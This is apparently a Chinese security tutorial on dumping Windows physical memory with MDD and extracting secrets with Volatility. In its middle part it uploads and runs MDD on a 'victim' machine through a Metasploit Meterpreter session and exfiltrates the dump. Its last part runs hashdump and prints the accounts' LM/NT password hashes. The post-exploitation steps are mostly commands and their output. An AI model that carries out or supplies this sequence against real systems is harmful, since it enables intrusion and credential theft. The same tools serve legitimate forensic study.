解析Windows系统内存中的数据安全隐患

　　ManTech MDD(http://www.mantech.com/msma/MDD.asp))是遵循GPL协议发布的，MDD可以复制以下微软操作系统内存的所有内容：WINDOWS 2000, Windows XP, Windows 2003 Server, Windows 2008 Server。

　　从ManTech网站下载MDD后，你必须使用命令行来运行MDD程序。

　　MDD命令行用法

　　mdd -o 输出文件名

　　例如：

　　C:\tools\mdd> mdd -o memory.dd

　　-> mdd

　　-> ManTech Physical Memory Dump Utility

　　Copyright (C) 2008 ManTech Security & Mission Assurance

　　-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'

　　This is free software, and you are welcome to redistribute it

　　under certain conditions; use option `-c' for details.

　　-> Dumping 255.48 MB of physical memory to file 'memory.dd'.

　　65404 map operations succeeded (1.00)

　　0 map operations failed

　　took 21 seconds to write

　　MD5 is: a48986bb0558498684414e9399ca19fc

　　输出文件通常都会涉及镜像，MDD的功能仅限于复制物理内存，所以必须利用其他工具来分析内存镜像。

　　这里我们使用Metasploit Meterpreter和MDD共同来完成下面的工作。

　　首先需要更新MDD。

　　meterpreter > upload /root/mdd.exe .

　　[*] uploading : /root/mdd.exe -> .

　　[*] uploaded : /root/mdd.exe -> .\mdd.exe

　　meterpreter > ls

　　Listing: c:\

　　============

　　Mode Size Type Last modified Name

　　---- ---- ---- ------------- ----

　　100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT

　　100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS

　　40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings

　　100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS

　　100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS

　　100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM

　　40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files

　　40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information

　　40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS

　　100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini

　　100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe

　　100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr

　　100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

　　在被攻击者的机器上执行MDD来获得RAM信息

　　meterpreter > execute -f "cmd.exe" -i -H

　　Process 1908 created.

　　Channel 2 created.

　　Microsoft Windows XP [Version 5.1.2600]

　　(C) Copyright 1985-2001 Microsoft Corp.

　　c:\> mdd.exe -o memory.dd

　　mdd.exe -o memory.dd

　　-> mdd

　　-> ManTech Physical Memory Dump Utility

　　Copyright (C) 2008 ManTech Security & Mission Assurance

　　-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'

　　This is free software, and you are welcome to redistribute it

　　under certain conditions; use option `-c' for details.

　　-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

　　130940 map operations succeeded (1.00)

　　0 map operations failed

　　took 23 seconds to write

　　MD5 is: be9d1d906fac99fa01782e847a1c3144

　　这里，我们只需要毫不费力的运行工具，所需的数据将会被捕获下来。

　　meterpreter > execute -f mdd.exe -a "-o demo.dd"

　　Process 3436 created.

　　我们需要证实内存镜像已被捕获。

　　meterpreter > ls

　　Listing: C:\

　　============

　　Mode Size Type Last modified Name

　　---- ---- ---- ------------- ----

　　100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip

　　100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT

　　100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS

　　40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi

　　40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings

　　40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2

　　100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip

　　100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS

　　40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub

　　100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS

　　100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM

　　40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2

　　40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files

　　40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER

　　40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information

　　40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS

　　100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt

　　100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini

　　100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd

　　100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe

　　100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr

　　100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys

　　40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers

　　40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share

　　100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

　　Download memory dump using Meterpreter.

　　meterpreter > download memory.dd .

　　[*] downloading: memory.dd -> .

　　[*] downloaded : memory.dd -> ./demo.dd

　　meterpreter >

　　我们已得到了.dd的本地映像，现在就可以利用http://forensiczone.blogspot.com/2009/01/using-volatility-1.html提供的操作步骤来获取内存中的敏感信息。

　　附：

　　Volatility(https://www.volatilesystems.com/default/volatility)

　　$python volatility

　　Volatile Systems Volatility Framework v1.3

　　Copyright (C) 2007,2008 Volatile Systems

　　Copyright (C) 2007 Komoku, Inc.

　　This is free software; see the source for copying conditions.

　　There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

　　usage: volatility cmd [cmd_opts]

　　Run command cmd with options cmd_opts

　　For help on a specific command, run 'volatility cmd --help'

　　Supported Internel Commands:

　　connections Print list of open connections

　　connscan Scan for connection objects

　　connscan2 Scan for connection objects (New)

　　datetime Get date/time information for image

　　dlllist Print list of loaded dlls for each process

　　dmp2raw Convert a crash dump to a raw dump

　　dmpchk Dump crash dump information

　　files Print list of open files for each process

　　hibinfo Convert hibernation file to linear raw image

　　ident Identify image properties

　　memdmp Dump the addressable memory for a process

　　memmap Print the memory map

　　modscan Scan for modules

　　modscan2 Scan for module objects (New)

　　modules Print list of loaded modules

　　procdump Dump a process to an executable sample

　　pslist Print list of running processes

　　psscan Scan for EPROCESS objects

　　psscan2 Scan for process objects (New)

　　raw2dmp Convert a raw dump to a crash dump

　　regobjkeys Print list of open regkeys for each process

　　sockets Print list of open sockets

　　sockscan Scan for socket objects

　　sockscan2 Scan for socket objects (New)

　　strings Match physical offsets to virtual addresses (may take a while, VERY verbose)

　　thrdscan Scan for ETHREAD objects

　　thrdscan2 Scan for thread objects (New)

　　vaddump Dump the Vad sections to files

　　vadinfo Dump the VAD info

　　vadwalk Walk the vad tree

　　Supported Plugin Commands:

　　cachedump Dump (decrypted) domain hashes from the registry

　　hashdump Dump (decrypted) LM and NT hashes from the registry

　　hivelist Print list of registry hives

　　hivescan Scan for _CMHIVE objects (registry hives)

　　lsadump Dump (decrypted) LSA secrets from the registry

　　memmap_ex_2 Print the memory map

　　printkey Print a registry key, and its subkeys and values

　　pslist_ex_1 Print list running processes

　　pslist_ex_3 Print list running processes

　　usrdmp_ex_2 Dump the address space for a process

　　Example: volatility pslist -f /path/to/my/file

　　1. 运行hivescan得到所需偏移量

　　$ python volatility hivescan -f demo.dd

　　Offset (hex)

　　42168328 0x2837008

　　42195808 0x283db60

　　47598392 0x2d64b38

　　155764592 0x948c770

　　155973608 0x94bf7e8

　　208587616 0xc6ecb60

　　208964448 0xc748b60

　　234838880 0xdff5b60

　　243852936 0xe88e688

　　251418760 0xefc5888

　　252887048 0xf12c008

　　256039736 0xf42db38

　　269699936 0x10134b60

　　339523208 0x143cb688

　　346659680 0x14a99b60

　　377572192 0x16814b60

　　387192184 0x17141578

　　509150856 0x1e590688

　　521194336 0x1f10cb60

　　523667592 0x1f368888

　　527756088 0x1f74eb38

　　2. 运行hivelist

　　$ python volatility hivelist -f demo.dd -o 0x2837008

　　Address Name

　　0xe2610b60 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat

　　0xe25f0578 \Documents and Settings\Sarah\NTUSER.DAT

　　0xe1d33008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat

　　0xe1c73888 \Documents and Settings\LocalService\NTUSER.DAT

　　0xe1c04688 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat

　　0xe1b70b60 \Documents and Settings\NetworkService\NTUSER.DAT

　　0xe1658b60 \WINDOWS\system32\config\software

　　0xe1a5a7e8 \WINDOWS\system32\config\default

　　0xe165cb60 \WINDOWS\system32\config\SAM

　　0xe1a4f770 \WINDOWS\system32\config\SECURITY

　　0xe1559b38 [no name]

　　0xe1035b60 \WINDOWS\system32\config\system

　　0xe102e008 [no name]

　　3. Password Hash (-y System Hive Offset)(-s SAM Hive

　　$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60

　　Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::

　　Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

　　HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::

　　SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::

　　phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::

　　ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::

　　Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::